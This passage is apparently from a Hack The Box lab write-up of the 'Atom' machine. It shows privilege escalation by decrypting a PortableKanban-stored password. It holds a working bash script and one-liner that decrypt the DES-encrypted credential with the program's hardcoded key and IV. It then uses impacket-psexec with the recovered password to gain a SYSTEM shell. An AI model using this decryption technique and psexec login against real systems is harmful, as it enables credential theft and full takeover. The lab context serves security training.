PortableKaban
As the automated scanning proved ineffective, manual enumeration of the target system became necessary. During this process, I stumbled upon an intriguing discovery, an unconventional third-party task-management program called PortableKanban. The program appears to be purely end-user-only and turned out to be configured with the target Redis server instance as the backend. The configuration file also included an encrypted password string. The obsolete program, later, was confirmed to be vulnerable to offline decryption.
Obtaining the CLEARTEXT password for the Redis server in its configuration file granted access to the instance at last. The Redis server contained what appears to be the credential string of the administrator user along with the IDENTICAL encrypted string found in the configuration file for PortableKanban. This evidential discovery solidified the speculation.
If the administrator user is indeed the system user, and the password is reused, privilege escalation can be achieved by decrypting the encrypted password string that supposedly belongs to the administratr user
Decryption
Looking at one of the available Python scripts for decryption, the PortableKanban program utilizes the outdated DES algorithm. The Key and initialization vector (IV) needed for decryption are explicitly provided in the script as the program was reverse-engineered by the original author and those secrets were extracted.
Since there is no such file as PortableKanban.pk3, but the encrypted password string is readily-available, I can just write one
Bash Scripting
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ cat decrypt.sh
#!/bin/bash
# Replace these values with the actual values you have
encrypted_password_base64='Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'
to_Hex(){
echo $1 | xxd -p -l 8
}
key=$(to_Hex 7ly6UznJ)
iv=$(to_Hex XuVUm5fR)
# Decode the base64-encoded password
encrypted_password=$(echo "$encrypted_password_base64" | base64 -d)
# Decrypt the password using OpenSSL and DES
decrypted_password=$(echo -n "$encrypted_password" | openssl enc -des -d -K "$key" -iv "$iv")
echo "decrypted password: $decrypted_password"It’s a simple bash script that does the same thing
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ ./decrypt.sh
Decrypted Password: kidvscat_admin_@123
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ echo 'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi' | base64 -d | openssl enc -des -d -K $(echo 7ly6UznJ | xxd -p -l 8) -iv $(echo XuVUm5fR | xxd -p -l 8)
kidvscat_admin_@123Executing the script outputs the supposed password of the administrator user; kidvscat_admin_@123
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ impacket-psexec administrator@$IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: kidvscat_admin_@123
[*] Requesting shares on 10.10.10.237.....
[*] Found writable share ADMIN$
[*] Uploading file NxTAidol.exe
[*] Opening SVCManager on 10.10.10.237.....
[*] Creating service RyCe on 10.10.10.237.....
[*] Starting service RyCe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> hostname
ATOM
C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
IPv4 Address. . . . . . . . . . . : 10.10.10.237
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
10.10.10.2It indeed belongs to the administrator user
System Level Compromise